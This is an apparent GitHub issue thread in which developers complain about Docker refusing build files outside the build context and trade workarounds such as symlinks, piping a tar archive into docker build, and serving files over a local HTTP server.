Usage:	docker build [OPTIONS] PATH | URL | -

Build an image from a Dockerfile

People should refer to extended description on the website:

https://docs.docker.com/engine/reference/commandline/build/

The docker build command builds Docker images from a Dockerfile and a “context”. A build’s context is the set of files located in the specified PATH or URL. The build process can refer to any of the files in the context. For example, your build can use a COPY instruction to reference a file in the context.

The URL parameter can refer to three kinds of resources: Git repositories, pre-packaged tarball contexts and plain text files.

Reading which it’s quite easy to grasp what “Forbidden path” really means. It doesn’t have anything to do with permissions.

@StingyJack

I should not need to digest tomes of information just to “get started”.

Writing Dockerfiles for your project doesn’t sound “get started” to me. It requires quite an advanced knowledge. Getting started tutorial describes setting up very simple project that doesn’t require any prior knowledge. But if you need to setup anything more complex you must know how Docker works. And yes, it requires quite a lot of time to figure out.

Super clean and direct and works fine, at least for me: https://www.jamestharpe.com/include-files-outside-docker-build-context/

I’m not compiling anything

Well, you’re compiling an image. Even though you have already “built” a thing you want to put into an image, you have not built an image.

It doesnt tell me what the build context is.

Well, error messages should not replace documentation. screenshot from 2017-11-27 03 55 28

5 years later and docker still issues this cryptic error message that rivals ones from nuget.

How about at least putting in “Even though you are in path X when you issued the docker command, and your dockerfile has a path relative to X, and you have specified a working directory in the dockerfile, docker is going to be working in path Y (ps. u r stupid noob)”

At least I think that’s what the obstacle preventing me from completing a basic walkthrough. This tech seems great and all, but I shouldn’t need to spend a few weeks researching the ins and outs and dealing with 5 year old bugs like this just to try it.

I’m running into this issue as well in a Go project. Here’s how this became a problem for me:

I want to run a container for developing my server locally, which has the following approximate structure:

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile

Inside of my Dockerfile, there are two options I can think of here:

  1. ADD …/ /go/src/MyOrg
  2. Only add the main package and then install the dependencies from the repo

The first option doesn’t work because of this bug The second option isn’t only awful, but doesn’t work because of moby#6396 (Another multiple-year-old unsolved issue) and MyOrg happens to be bristling with private repos

My only other option is to put all the dependencies into the vendor folder

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile
    └───vendor
        └───Dependency
            │   dep.go

Now if I ever want to update Dependency/dep.go I have to run a script to manually copy Dependency folder into the vendor folder. Just bizarre.

Or alternatively as @Romathonat kindly pointed out, I can enter cd $GOPATH/src and run the command $ docker build -f ./MyOrg/Main/Dockerfile -t MyProj . so now my container is a nice husky ~300mb due to how much is in $GOPATH/src.

Poking the issue once again.

For those still seeking a usable workaround, there was a method stated somewhere above which we adopted some time ago: using a separate repository and git cloning a specific revision in the Dockerfile. It works great and if you don’t mind having a second repository it is a nice workaround.

The suggestion to put it into the root and using .dockerignore would work if there was a way to specify a file to use as a .dockerignore when running docker build (like it is possible to do so for the Dockerfile, judging by https://docs.docker.com/engine/reference/commandline/build/ it is not possible - docker-compose seems not to have an option either: https://docs.docker.com/compose/compose-file/).

Imagine the following structure:

project-root |------------ library (included by all sub-projects) |------------ sub-project1 |------------ sub-project2 |------------ sub-project3

You would need to have one Dockerfile and one .dockerignore file per sub-project, that would be ugly, but acceptable as it could be easily dealt with by using docker-compose. However, as stated above, there seems to be no way to specify the .dockerignore file for a build, which would mean that one would have to rename files before every build (which in turn means no docker-compose).

Structure:

  • Libraries — Library 1 — Library 2 — Library 3
  • APIs — API 1 - reference library 1 — API 2 - references library 2 and library 3

If I request API 1to be built, i do NOT need to send library 2, library 3, and API2. I ONLY need Library 1 and API 1.

This is a C# project reference: < ProjectReference Include=“…\…\…\BuildingBlocks\EventBus\EventBusRabbitMQ\EventBusRabbitMQ.csproj” />

Your Options:

A. Change Project Reference’s to local dll’s, destroying all intellisense for every library

B. Hot-Swap project references to specifically only build for dll as needed for each individual docker build, (hundred of hot swaps, sounds fun)

C. Send 800mb per build, when only 2 of those are actually needed

D. Don’t use Docker for anything build related, one of the main reasons I want to move to docker (remove dependency on developer machine, one might use mac with .net core 1.1 installed, one might have 2.0 installed on windows, etc).

E. Fix Docker and make everyone happy.

I tried symlinks up the wazooo, did not work. Copying the file to the root of the project the uuid isn’t as pretty as symlinks, but it does work.

@ORESoftware The trick I’ve used in the past is to use symlinks and then rsync everything with symlink resolution to a separate folder for building. It doesn’t really work if you have really large files in your build, but for most use cases it’s a workaround that can get the job done.

You can just build the Docker context directly:

# Tar the current directory, then change to another directory and add it to the tar
tar -c ./* -C $SOME_OTHER_DIRECTORY some_files_from_other_directory| docker build -

This is basically what https://github.com/six8/dockerfactory does

@Vanuan

“So if you want to use files outside the build context you’d have to copy those files to the docker server.”

So, can that not be done automatically? If I specify a file out of the context, is it not possible and/or feasible to automatically copy it to the server in order to build it into the image?

“One things docker newbies don’t realize is that you can keep Dockerfile separate from build context.”

So, the unfortunate haughty attitude to your “newbie” users aside, this is actually what has already been suggested (by @Romathonat above), and as I stated in my own post, this is the solution I am currently using. This works for me. However, if I had multiple, shared config, and my individual docker images were rather big, this would get fairly prohibitive, as it has been stated by others that each docker image would contain the files for every other docker image, even though it would never need them. I could easily see why people would be frustrated by what they could easily see as stonewalling in refusing to work with users’ requests and needs and implement this feature.

“You’re a docker hosting provider (or CI) and allow people to upload their private git repositories with Dockerfiles.”

If I understand this correctly, it seems like this is a case where someone is intentionally setting up a situation just to create this problem. Wouldn’t this mean that people are uploading not just Dockerfiles, but actual private information to this central server? Private information a malicious Dockerfile could then supposedly read and include into its own image via an “ADD” command? Because if I can just ADD someone else’s Dockerfile, it doesn’t seem like a catastrophic issue (although definitely still a security breach), but how would the system be able to “read” that other file in the first place? Is everyone acting under the same user in this CI system (which seems like a major security breach right there)?

It seems like this is a problem the creator of this service should be solving with virtualization, security “jails”, system access security, etc., rather than force the other 99.9% of docker users into a strict system just to prevent this one sysadmin from blowing their own toes off.

Secondly, there are many ways for a sysadmin to get around this problem. First off, system access control (if my user has acdcess and/or permissions to a set of files, I can include them, otherwise, I get a read access error, etc.), virtualization via VMs, etc., or other tactics (such as not allowing people to be uploading private information which can then be downloaded by other users via malicious Dockerfiles in the first place), etc. This seems more of an operational/systems problem to me, not a job for a particular tool to be enforcing a strict paradigm just to save greenhorn sysadmins from making security miscues.

I suppose it could be a Docker in Docker but there are many options for virtualization depending on your platform.

@thaJeztah Good point. I think what’s confusing to me is that there are two phases of “adding” a file. There’s the file getting included in the build context by virtue of which directory is specified in the docker build command. And then there’s the file getting added from the build context to the image via the ADD command in the Dockerfile.

Intuitively I always have expected ADD to add a file both to the build context and to the image. If that’s not how it works then that’s fine, but it strikes me as potentially very helpful to have a command that does just that. ADD_TO_CONTEXT or something like that.

Not an ideal solution, but If you only need to load a couple files from a directory on the local filesystem it’s possible to workaround by serving a local filesystem over HTTP:

# Set DOCKER_IP=$(docker-machine ip)
# docker-compose.yml
version: '2'
services:
  http_fs:
    image: python:2-onbuild
    command: sh -c 'cd /fs; python -m SimpleHTTPServer 8080'
    ports:
      - '8080:8080'
    volumes:
      - ..:/fs
  foo:
    build:
      context: docker/foo
      args:
        HTTP_FS: "http://${DOCKER_IP}:8080"
# docker/foo/Dockerfile
ARG HTTP_FS
RUN wget "${HTTP_FS}/somefile"

This requires turning on http_fs ( docker-compose up http_fs) before building foo (docker-compose build foo). AFAIK there isn’t a way to declare a build dependency via depends_on in docker-compose.yml

That might do the trick. It’s a little annoying to have to build two images instead of one and error-prone if someone forgets but it may be a quicker and easier solution to the problem right now.

Hi i find a better solution using compose-file.yml version 2 - u can pas the context of the build. So u can place the files wherever u want and just pass them the correct context.